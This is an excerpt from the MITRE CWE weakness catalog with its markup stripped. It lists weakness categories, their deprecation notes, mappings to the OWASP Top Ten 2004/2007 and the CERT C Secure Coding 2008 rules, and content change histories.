Taxonomy_Mappings, Type - - J2EE Environment Issues - - - - Weaknesses in this category are related to improper handling of locks that are used to control access to resources. - - - - - - - - - - - - - Resource Locking problems - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to improper handling of communication channels and access paths. These weaknesses include problems in creating, managing, or removing alternate channels and alternate paths. Some of these can overlap virtual file problems and are commonly used in "bypass" attacks, such as those that exploit authentication errors. - - - - - - - - - - - - - - - CHAP.VIRTFILE - Channel and Path Errors - - - - Most of these issues are probably under-studied. Only a handful of public reports exist. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Maintenance_Notes, Name, Relationship_Notes, Relationships - - Channel and Path Errors - - - - This category has been deprecated because it redundant with the grouping provided by CWE-417. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Name, Relationships, Taxonomy_Mappings, Type - - Channel Errors - - - - Weaknesses in this category are related to improper management of handlers. - - - - - - - - - - - Handler Errors - - - - This concept is under-defined and needs more research. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to unexpected behaviors from code that an application uses. - - - - - - - - - - - - - - - - - - - - - - - - Behavioral problems - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Taxonomy_Mappings, Type - - Web Problems - - - - This weakness has been deprecated because it was a duplicate of CWE-355. All content has been transferred to CWE-355. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Applicable_Platforms, Description, Name, Relationships, Research_Gaps, Taxonomy_Mappings, Type - - User Interface Quality Errors - User Interface Errors - - - - Weaknesses in this category occur in behaviors that are used for initialization and breakdown. - - - - - - - - - - - - - Initialization and Cleanup Errors - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Research_Gaps - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Data Structure Issues - - - - Weaknesses in this category are related to improper handling of pointers. - - - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that occur when the product does not sufficiently encapsulate critical data or functionality. According to the authors of the Seven Pernicious Kingdoms, "Encapsulation is about drawing strong boundaries. In a web browser that might mean ensuring that your mobile code cannot be abused by other mobile code. On the server it might mean differentiation between validated data and unvalidated data, between one user's data and another's, or between data users are allowed to see and data that they are not." - - - - - - - - - - - - - - - - - The "encapsulation" term is used in multiple ways. Within some security sources, the term is used to describe the establishment of boundaries between different control spheres. Within general computing circles, it is more about hiding implementation details and maintainability than security. Even within the security usage, there is also a question of whether "encapsulation" encompasses the entire range of security problems. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings, Terminology_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Description, Maintenance_Notes, Name, Other_Notes, References, Relationships, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Encapsulation - Insufficient Encapsulation - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Other_Notes, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Other_Notes - - Mobile Code Issues - - - - This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Byte/Object Code - - - - This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Motivation/Intent - - - - This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Type - - Intentional - Intentionally Introduced Weakness - - - - This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Taxonomy_Mappings, Type - - Nonmalicious - Intentionally Introduced Nonmalicious Weakness - - - - This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Taxonomy_Mappings, Type - - Other - Other Intentional, Nonmalicious Weakness - - - - This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Inadvertent - Inadvertently Introduced Weakness - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Taxonomy_Mappings, Type - - .NET Environment Issues - - - - Weaknesses in this category are related to concurrent use of shared resources. - - - - - - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-09-27 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationship_Notes, Relationships, Type - - Often Misused: Arguments and Parameters - - - - Weaknesses in this category are related to incorrectly written expressions within code. - - - - - - - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - This category has been deprecated. It covered a very low level of abstraction based on operating system, which was not useful for any existing view. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - UNIX Path Link Problems - - - - This category has been deprecated. It covered a very low level of abstraction based on operating system, which was not useful for any existing view. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Name, Relationships, Type - - Windows Path Link Problems - - - - This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. - - - CWE Community - 2007-10-01 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Type - - Weaknesses that Affect Files or Directories - - - - This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Type - - Weaknesses that Affect Memory - - - - This category has been deprecated. It was not actively maintained, and it was not useful to stakeholders. It was originally created before CWE 1.0 as part of view CWE-631, which was a simple example of how views could be structured within CWE. - - - CWE Content Team - MITRE - 2007-10-01 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Type - - Weaknesses that Affect System Processes - - - - This category has been deprecated as it was found to be an unnecessary abstraction of platform specific details. Please refer to the category CWE-632 and weakness CWE-66 for relevant relationships. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Windows Virtual File Problems - - - - This category has been deprecated as it was found to be an unnecessary abstraction of platform specific details. Please refer to the category CWE-632 and weakness CWE-66 for relevant relationships. - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - Mac Virtual File Problems - - - - Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2007. - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2007. - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2007. - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2007. - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2007. - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2007. - - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2007. - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2007. - - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2007. - - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - - - Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2007. - - - - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - - - Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2004. - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2004. - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - - - Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - - - Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - - - Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2004. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Veracode - 2008-08-15 - Suggested creation of view and provided mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Preprocessor (PRE) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-684 PRE09-C Do not replace secure functions with less secure functions - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 01 - Preprocessor (PRE) - CERT C Secure Coding (2008 Version) Section 01 - Preprocessor (PRE) - - - - Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-547 DCL06-C Use meaningful symbolic constants to represent literal values in program logic - CWE-628 DCL10-C Maintain the contract between the writer and caller of variadic functions - CWE-686 DCL35-C Do not invoke a function using a type that does not match the function definition - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 02 - Declarations and Initialization (DCL) - CERT C Secure Coding (2008 Version) Section 02 - Declarations and Initialization (DCL) - - - - Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-467 EXP01-C Do not take the size of a pointer to determine the size of the pointed-to type - CWE-468 EXP08-C Ensure pointer arithmetic is used correctly - CWE-476 EXP34-C Ensure a null pointer is not dereferenced - CWE-628 EXP37-C Call functions with the arguments intended by the API - CWE-704 EXP05-C Do not cast away a const qualification - CWE-783 EXP00-C Use parentheses for precedence of operation - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 03 - Expressions (EXP) - CERT C Secure Coding (2008 Version) Section 03 - Expressions (EXP) - - - - Weaknesses in this category are related to the rules and recommendations in the Integers (INT) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-20 INT06-C Use strtol() or a related function to convert a string token to an integer - CWE-129 INT32-C Ensure that operations on signed integers do not result in overflow - CWE-190 INT03-C Use a secure integer library - CWE-190 INT30-C Ensure that unsigned integer operations do not wrap - CWE-190 INT32-C Ensure that operations on signed integers do not result in overflow - CWE-190 INT35-C Evaluate integer expressions in a larger size before comparing or assigning to that size - CWE-192 INT02-C Understand integer conversion rules - CWE-192 INT05-C Do not use input functions to convert character data if they cannot handle all possible inputs - CWE-192 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data - CWE-197 INT02-C Understand integer conversion rules - CWE-197 INT05-C Do not use input functions to convert character data if they cannot handle all possible inputs - CWE-197 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data - CWE-369 INT33-C Ensure that division and modulo operations do not result in divide-by-zero errors - CWE-466 INT11-C Take care when converting from pointer to integer or integer to pointer - CWE-587 INT11-C Take care when converting from pointer to integer or integer to pointer - CWE-606 INT03-C Use a secure integer library - CWE-676 INT06-C Use strtol() or a related function to convert a string token to an integer - CWE-681 INT15-C Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types - CWE-681 INT31-C Ensure that integer conversions do not result in lost or misinterpreted data - CWE-681 INT35-C Evaluate integer expressions in a larger size before comparing or assigning to that size - CWE-682 INT07-C Use only explicitly signed or unsigned char type for numeric values - CWE-682 INT13-C Use bitwise operators only on unsigned operands - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 04 - Integers (INT) - CERT C Secure Coding (2008 Version) Section 04 - Integers (INT) - - - - Weaknesses in this category are related to the rules and recommendations in the Floating Point (FLP) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-369 FLP03-C Detect and handle floating point errors - CWE-681 FLP33-C Convert integers to floating point for floating point operations - CWE-681 FLP34-C Ensure that floating point conversions are within range of the new type - CWE-682 FLP32-C Prevent or detect domain and range errors in math functions - CWE-682 FLP33-C Convert integers to floating point for floating point operations - CWE-686 FLP31-C Do not call functions expecting real values with complex values - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, References, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 05 - Floating Point (FLP) - CERT C Secure Coding (2008 Version) Section 05 - Floating Point (FLP) - - - - Weaknesses in this category are related to the rules and recommendations in the Arrays (ARR) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-119 ARR00-C Understand how arrays work - CWE-119 ARR33-C Guarantee that copies are made into storage of sufficient size - CWE-119 ARR34-C Ensure that array types in expressions are compatible - CWE-119 ARR35-C Do not allow loops to iterate beyond the end of an array - CWE-129 ARR00-C Understand how arrays work - CWE-129 ARR30-C Guarantee that array indices are within the valid range - CWE-129 ARR38-C Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element - CWE-467 ARR01-C Do not apply the sizeof operator to a pointer when taking the size of an array - CWE-469 ARR36-C Do not subtract or compare two pointers that do not refer to the same array - CWE-469 ARR37-C Do not add or subtract an integer to a pointer to a non-array object - CWE-665 ARR02-C Explicitly specify array bounds, even if implicitly defined by an initializer - CWE-805 ARR33-C Guarantee that copies are made into storage of sufficient size - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 06 - Arrays (ARR) - CERT C Secure Coding (2008 Version) Section 06 - Arrays (ARR) - - - - Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-78 STR02-C Sanitize data passed to complex subsystems - CWE-88 STR02-C Sanitize data passed to complex subsystems - CWE-119 STR31-C Guarantee that storage for strings has sufficient space for character data and the null terminator - CWE-119 STR32-C Null-terminate byte strings as required - CWE-119 STR33-C Size wide character strings correctly - CWE-120 STR35-C Do not copy data from an unbounded source to a fixed-length array - CWE-135 STR33-C Size wide character strings correctly - CWE-170 STR03-C Do not inadvertently truncate a null-terminated byte string - CWE-170 STR32-C Null-terminate byte strings as required - CWE-193 STR31-C Guarantee that storage for strings has sufficient space for character data and the null terminator - 